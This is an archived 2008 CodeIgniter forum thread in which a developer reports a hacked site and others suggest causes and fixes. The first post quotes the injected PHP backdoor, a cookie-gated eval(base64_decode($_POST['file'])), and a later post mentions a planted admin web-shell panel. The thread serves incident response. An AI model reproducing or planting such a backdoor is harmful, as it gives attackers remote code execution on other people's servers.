
This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.


Possible hack, any advice?

April 15, 2008 2:42pm

  • #1 / Apr 15, 2008 2:42pm

    kilishan

    183 posts

    The other day I noticed that a placeholder account for a webapp I’m working on over at http://critormiss.com started spitting out errors and refusing to work. The strange thing was that I haven’t made any changes in a while. I’ve searched the internet and seen a number of other sites recently getting the same errors.

    Basically, at the top of several of my CI base classes (like Loader.php, CodeIgniter.php, config/url_helper, etc) the opening line has been modified to read:

    <?php if(md5($_COOKIE['_wp_debugger'])=="cd15478ffb4a49eece991be29cdf8f64"){ eval(base64_decode($_POST['file'])); exit; } ?><?php  if (!defined('BASEPATH')) exit('No direct script access allowed');

    I also found a new file (simply called _new.php) in the /server/ directory. I’ve renamed it and can provide it if anyone wants to browse through it.

    My .htaccess file is:

    RewriteEngine on
    RewriteCond $1 !^(index\.php|public|tmp|robots\.txt)
    RewriteRule ^(.*)$ /index.php/$1 [L]

    Anyone know how they might have modified the files, and how I can keep them from doing it again?

    Thanks!

  • #2 / Apr 15, 2008 3:06pm

    Tom Glover

    493 posts

    I have never seen a hack like this. I’m confused, but I’m sure someone else in the forum will have a clue on how they are doing it.

  • #3 / Apr 15, 2008 3:10pm

    kilishan

    183 posts

    The thing that really makes me nervous is I just found an admin directory in my “public directory” (which typically holds my css, etc.) that has an admin control panel of sorts that allowed them to run php and cmd scripts, analyse other weaknesses, etc. Looks like it all happened on the 10th and 11th. I’ve renamed it and made the host aware, but really wish I knew how they got in.

  • #4 / Apr 15, 2008 3:12pm

    Are you the only one who works on your server? Did you ever give your password to some friends? Is your FTP access secure enough, with a strong password that nobody could guess?

  • #5 / Apr 15, 2008 7:17pm

    Derek Allard

    3168 posts

    That reeks badly of a poorly configured and protected host.  I see these all the time when doing EE support.  First of all, look through all directories with writable permissions for other files that don’t belong.  Next up, contact your host and ask them for more information.  Nearly all hosts will be able to tell you what happened.

    The classic situation here is that you’re on a shared server (not uncommon, nor bad by default) and another user on the same server has escalated their privs to be able to get at your account.  It may be a simple fix, or it may be time to switch hosts 😉  Wait and see what their response is.

    To be clear, I’m NOT saying your host is to blame (but I’m sure thinking it loudly).

  • #6 / Apr 15, 2008 7:26pm

    Firestorm ZERO

    26 posts

